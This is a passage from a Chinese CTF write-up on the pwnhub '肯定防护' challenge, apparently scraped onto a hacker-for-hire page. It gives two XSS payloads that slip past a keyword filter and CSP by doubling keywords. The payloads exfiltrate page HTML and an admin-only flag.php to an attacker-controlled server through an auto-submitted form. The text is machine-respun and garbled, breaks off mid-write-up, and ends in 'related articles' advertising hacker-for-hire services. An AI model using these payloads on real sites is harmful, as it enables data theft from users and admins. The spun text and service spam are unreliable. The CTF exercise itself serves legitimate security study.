pwnhub -- 肯定防护 writeup
周末做了一道关于我来说很蛋疼的标题...可是看了各位师傅的writeup就觉得自己的思路太窄了....
标题地址:https://pwnhub.cn/gamedetail?id=13
注册之后有个留言板,有CSP(不允许对外发送恳求),通过测验只过滤一次某些单次,如:on,oonn就能过。
用表单来绕过csp回来页面到我的服务器上,看到提示
poc:
<imong src=x oonnerror="var htmlstr = document.getElementsByTagName('html')[0].innerHTML;$('body').append('<form actioonn=http://xxx.xxx.xxx.xxx/hub1'+ escape(htmlstr)+' method=GET id=show></form><scronipt>document.getElementById('show').submit()</scronipt>')">
转码后发现提示( http://zone.secevery.com/code/index.html 在线编码转码...之前写的辣鸡程序...):
拜访http://52.80.63.91/adminshigesha233e3333/ 提示flag.php
拜访flag.php 提示只要admin能看....
测验盲打admin回来flag.php的内容.
poc:
<imong src=x oonnerror="$.get('/adminshigesha233e3333/flag.php', functioonn(data){$('body').append('<form actioonn=http://xxx.xxx.xxx.xxx/'+ escape(data)+' method=GET id=show></form><scronipt>document.getElementById('show').submit()</scronipt>')})">
提示:nothing here,╮(╯-╰)╭,what ever you try, only from adminshigesha233e3333 can read it...
http://52.80.63.91/adminshigesha233e3333/
PS:在这里卡了一天多,在各种测验加header拜访,get拜访,post拜访,各种蛋疼,测到深夜的时分标题后端挂了...
检查源码:
[1] [2] 黑客接单网
相关文章
如果是因为赌博而欠下的债
版本并没有遇到失败的情况2019年06月15日,360CERT监测到在野的Oracle Weblogic远程反序列化命令执行漏洞,该漏洞绕过了最新的Weblogic补丁(CVE-2019-2725),...
什么是流量绑架,怎么避免流量绑架?
流量绑架,是运用各种歹意软件修正阅读器、确定主页或不断弹出新窗口,强制用户拜访某些网站,然后形成用户流量丢失的景象。流量绑架是一种陈旧的进犯方法,比方早已见惯的广告弹窗(如下图)等,很多人现已对此...
红客联盟论坛,挂科找黑客改成绩没用,损友圈怎么找黑客黑钱
外网: 安卓手机一枚 /// <param name="context"></param>return $tmp;关于网马的解密,我运用到了Malzilia...
黑客免费接单_黑客怎么找网址
7、1234567 (⬆ 1)2018年6月,国外安全研讨人员揭露了运用Windows 10下才被引进的新文件类型“.SettingContent-ms”履行恣意指令的进犯技巧,并揭露了POC。 而该...
黑吃黑:物联网僵尸网络作者在中兴路由器后门上添加了自己的后门
许多脚本小子正在运用兵器化的物联网缝隙运用脚本,运用供货商后门帐户进犯中兴路由器。具有挖苦意味的是,这不是脚本中仅有的后门。Scarface,代码的传播者也布置了自定义后门来黑那些运用该脚本的脚本小子...
黑客接单hzs_去哪找黑客做事
其间,清晰的针对我国境内施行进犯活动的,而且仍旧活泼的揭露APT 安排,包含海莲花,摩诃草,蔓灵花,Darkhotel,Group 123,毒云藤和蓝宝菇,其间毒云藤和蓝宝菇是360在2018年下半年...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!